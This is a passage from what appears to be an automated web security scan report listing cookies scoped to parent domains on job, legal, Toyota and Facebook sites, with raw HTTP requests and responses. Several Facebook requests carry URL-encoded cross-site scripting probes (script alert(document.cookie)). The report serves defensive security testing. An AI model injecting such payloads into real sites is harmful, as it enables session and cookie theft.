Set-Cookie: PHPSESSID=a827dr0sigiku3i02l6760rfb1; path=/; domain=hound.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Set-Cookie: country=United+States; expires=Sun, 20-Feb-2011 19:34:57 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 121008


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>The Largest Online Job Search Engine | Jobs from Employers | Hound.com</ti
...[SNIP]...

9.5. http://www.hound.com/gjsearchresult.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.hound.com
Path:   /gjsearchresult.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gjsearchresult.php HTTP/1.1
Host: www.hound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Fri, 21 Jan 2011 19:34:57 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=d9q7enc1nis5276b2qurtlt332; path=/; domain=hound.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: gjsearch.php?q=&l=
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8



9.6. http://www.lawcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.lawcrossing.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?utm_source=JDJournal&utm_medium=Banner&utm_campaign=leverage-300x250\ HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:13 GMT
Server: Apache
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=gs1oh9i6kad359a0jna6e84qs7; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 19:41:13 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 211139

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Legal Jobs | Law Jobs | Legal Job Search | Law Firm And Legal Recruiter | La
...[SNIP]...

9.7. http://www.lawcrossing.com/article/6070/Brooklyn-Law-School/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.lawcrossing.com
Path:   /article/6070/Brooklyn-Law-School/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /article/6070/Brooklyn-Law-School/ HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:46 GMT
Server: Apache
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=vl8einafm1n540cl32q4l331g3; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:46 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 144794

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...

9.8. http://www.lawcrossing.com/article/6154/Anne-Healy-LIDS/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.lawcrossing.com
Path:   /article/6154/Anne-Healy-LIDS/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /article/6154/Anne-Healy-LIDS/ HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:39 GMT
Server: Apache
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=kn84m4kfq0k9i5413blcf4rdv5; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:39 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 144589

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...

9.9. http://www.lawcrossing.com/images/banner/lc_bannerforjdj125x125.gif/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.lawcrossing.com
Path:   /images/banner/lc_bannerforjdj125x125.gif/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/banner/lc_bannerforjdj125x125.gif/ HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 21 Jan 2011 19:41:09 GMT
Server: Apache
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=d2dplbacjvjkr67gtesru8aj04; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 19:41:10 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103110

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...

9.10. http://www.lawcrossing.com/lcjssearchresults.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.lawcrossing.com
Path:   /lcjssearchresults.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lcjssearchresults.php HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=e5iouh0ohr4puh7rj3ce3m03n5; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 19:41:13 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 92150

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...

9.11. http://www.lawcrossing.com/salarysurvey/lcsalarysurvey.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.lawcrossing.com
Path:   /salarysurvey/lcsalarysurvey.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /salarysurvey/lcsalarysurvey.php HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 21 Jan 2011 22:29:48 GMT
Server: Apache
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=7ru8l85l763haf7r7bf41h50d6; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:49 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103222

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...

9.12. http://www.legalauthority.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.legalauthority.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.legalauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:21 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=itiitg0ro0btc7r4bgoq60nao3; path=/
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: public
Pragma: no-cache
Set-Cookie: PHPSESSID=itiitg0ro0btc7r4bgoq60nao3; path=/; domain=.legalauthority.com
Set-Cookie: LA_RUSH_ORDER=deleted; expires=Thu, 21-Jan-2010 19:41:21 GMT; path=/; domain=.legalauthority.com
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 130129

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
   <title>Legal Resume Consultant, Legal Job Search, Sample Attorney Resume, Legal S
...[SNIP]...

9.13. http://www.legalauthority.com/signup.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.legalauthority.com
Path:   /signup.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /signup.php HTTP/1.1
Host: www.legalauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:19 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=6g5f9o9lenr88jd1ft2nnmijv6; path=/
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: public
Pragma: no-cache
Set-Cookie: PHPSESSID=6g5f9o9lenr88jd1ft2nnmijv6; path=/; domain=.legalauthority.com
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 56091

                   
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Legal Recruiter, Law Student Job, Legal Employers, Legal Search Firm, Attorney Jobs . Legal Authority</title
...[SNIP]...

9.14. http://www.opensource.org/licenses/gpl-license.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/gpl-license.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/gpl-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:52:59 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=lrk48den811joe12r90meb8233; expires=Sun, 13-Feb-2011 23:26:19 GMT; path=/; domain=.opensource.org
Last-Modified: Fri, 21 Jan 2011 19:47:06 GMT
ETag: "137d5aff6fab07cd18eb3b969e04675a"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Content-Length: 7271
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

9.15. http://www.opensource.org/licenses/mit-license.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:45:06 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=3n29fortk8c5osv64jmeft3qn7; expires=Sun, 13-Feb-2011 22:18:26 GMT; path=/; domain=.opensource.org
Last-Modified: Fri, 21 Jan 2011 18:31:08 GMT
ETag: "f3ee3970abd9b05424adb4d6b0250644"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

9.16. http://www.resumeboomer.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.resumeboomer.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.resumeboomer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:25 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=rflo577r2gvrm7p49d1ei6a8c1; path=/; domain=resumeboomer.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18190


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

9.17. http://www.toyota.com/byt/pub/init.do

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.toyota.com
Path:   /byt/pub/init.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /byt/pub/init.do HTTP/1.1
Host: www.toyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=ISO-8859-1
Expires: Fri, 21 Jan 2011 18:45:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 21 Jan 2011 18:45:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID_BYT=FmnKN5JDVH1LwGnr9JLPLgMFhjMmjSgmvGhSQhD8ths2YbvThLTq!-1855535020; domain=.toyota.com; path=/
Content-Length: 38510


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

9.18. http://www.answers.com/topic/vinson-elkins-llp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.answers.com
Path:   /topic/vinson-elkins-llp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /topic/vinson-elkins-llp HTTP/1.1
Host: www.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:39:52 GMT
Server: AWS
Set-Cookie: lc=nt013; path=/; domain=www.answers.com; expires=Fri, 04-Feb-2011 18:39:52 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=05EA67FCD231E20FB8B1E7B8BD5DBA11; Path=/
Set-Cookie: settings=ver||fayt|1|ate|1|tabOrder|default|home|1; Domain=.answers.com; Expires=Sat, 21-Jan-2012 18:39:52 GMT; Path=/
Set-Cookie: settingsS=ver||fayt|1|ate|1|tabOrder|default|home|1; Domain=.answers.com; Path=/
Set-Cookie: afid=0; Expires=Sun, 13-Jan-2041 18:39:52 GMT; Path=/
Set-Cookie: GNFirstVisit=1295635192020; Expires=Sun, 13-Jan-2041 18:39:52 GMT; Path=/
Set-Cookie: tacodaSession=; Path=/
Set-Cookie: nafid=0; Path=/
Set-Cookie: referrerDomainSession=none; Path=/
Set-Cookie: firstPageTypeSession=topic-page; Path=/
Vary: Accept-Encoding
Connection: close
Content-Length: 69874

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html class="IE IEnew IE7" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.
...[SNIP]...

9.19. http://www.buyatoyota.com/NationalLanding.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.buyatoyota.com
Path:   /NationalLanding.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /NationalLanding.aspx HTTP/1.1
Host: www.buyatoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 21 Jan 2011 22:09:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: bgImage=Toyotathon_Flash_Piece; domain=.buyatoyota.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52305


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><!-- Page served fr
...[SNIP]...

9.20. http://www.facebook.com/BMWUSA

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /BMWUSA

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BMWUSA HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=85x21; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Djdjournal.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.jdjournal.com%252F2011%252F01%252F19%252Ffour-partners-from-vinson-elkins-join-gibson-dunn%252F%253F750aa%2527%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E9dfc99fca36%253D1%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=EvrQb; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Fri, 21 Jan 2011 19:51:54 GMT
Content-Length: 37193

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

9.21. http://www.facebook.com/EmploymentXing

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /EmploymentXing

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /EmploymentXing HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=557x557; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Djd2b.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.jd2b.com%252F%253Ff05bd%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253Ecf651820abc%253D1%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=Z_NLA; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2FEmploymentXing; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FEmploymentXing; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Fri, 21 Jan 2011 22:26:38 GMT
Content-Length: 21078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

9.22. http://www.facebook.com/campaign/impression.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /campaign/impression.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/impression.php?campaign_id=137675572948107&partner_id=jdjournal.com&placement=like_button&extra_1=http%3A%2F%2Fwww.jdjournal.com%2F2011%2F01%2F19%2Ffour-partners-from-vinson-elkins-join-gibson-dunn%2F%3F750aa%27%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E9dfc99fca36%3D1&extra_2=US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?href=http://www.jdjournal.com/&layout=standard&show_faces=true&width=450&action=like&font=arial&colorscheme=light&height=80
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dtheclicker.todayshow.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Ftheclicker.todayshow.com%252F%253F28d8a%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E1b20a3de4c0%253D1%26extra_2%3DUS; wd=85x21

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 43
Content-Type: image/gif
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Djdjournal.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.jdjournal.com%252F2011%252F01%252F19%252Ffour-partners-from-vinson-elkins-join-gibson-dunn%252F%253F750aa%2527%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E9dfc99fca36%253D1%26extra_2%3DUS; expires=Sun, 20-Feb-2011 18:46:47 GMT; path=/; domain=.facebook.com; httponly
X-Cnection: close
Date: Fri, 21 Jan 2011 18:46:47 GMT

GIF89a.............!.......,...........D..;

9.23. http://www.facebook.com/campaign/landing.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /campaign/landing.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/landing.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=85x21; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Djdjournal.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.jdjournal.com%252F2011%252F01%252F19%252Ffour-partners-from-vinson-elkins-join-gibson-dunn%252F%253F750aa%2527%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E9dfc99fca36%253D1%26extra_2%3DUS;

Response

HTTP/1.1 302 Found
Location: http://www.facebook.com/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: campaign_click_url=%2Fcampaign%2Flanding.php; expires=Sun, 20-Feb-2011 19:34:37 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Fri, 21 Jan 2011 19:34:37 GMT
Content-Length: 0


9.24. http://www.facebook.com/pages/JD2B/298408284363

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/JD2B/298408284363

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pages/JD2B/298408284363 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=557x557; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Djd2b.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.jd2b.com%252F%253Ff05bd%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253Ecf651820abc%253D1%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=jal5o; path=/; domain=.facebook.com
